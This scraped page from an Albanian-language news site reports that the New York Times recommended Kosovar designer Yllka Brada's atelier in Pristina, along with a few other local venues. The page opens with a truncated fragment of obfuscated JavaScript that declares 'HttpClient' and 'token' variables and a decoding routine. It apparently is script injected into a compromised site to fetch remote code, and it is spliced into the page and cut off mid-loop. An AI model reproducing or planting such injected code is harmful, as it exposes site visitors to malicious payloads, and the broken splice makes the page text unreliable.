;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Prestigjozja “New York Times” sugjeron Yllka Bradën!

By

Gazeta prestigjoze “New York Times”, në artikullin e saj se cilat janë vendet që ia vlen të vizitoni në Prishtinë ,një hapsirë të veçantë rezervoi edhe për dizenjatoren kosovare Yllka Brada.

Në artikullin për Prishtinën një vëmnedje mjaft të madhe kishin koleksionet elegante të Yllkës si dhe ateleja e saj.

‘Kjo punëtori me kreacione elegante që kushtojnë qindra herë më pak se sa do të kushtonin në Evropën Perëndimore, përfshinë fustane të mbrëmjes për femra, sako për meshkuj. Vitin e kaluar, dizenjatorja 29 vjeçare Yllka Brada që ka studiuar në Francë, ka hapur atelienë e saj në bulevardin “Nënë Tereza’- ishte shkrimi i që prezantonte punën e stilistes Brada .

Përpos saj gazeta prestigjioze dha edhe një listë të disa prej vendeve që mund ti vizitoni në Prishtinë e në të cilën bënin pjesë ,Muzeu Enologjik, Soma Book station dhe  Tartine. /Prive.al/

Artikuj të ngjashëm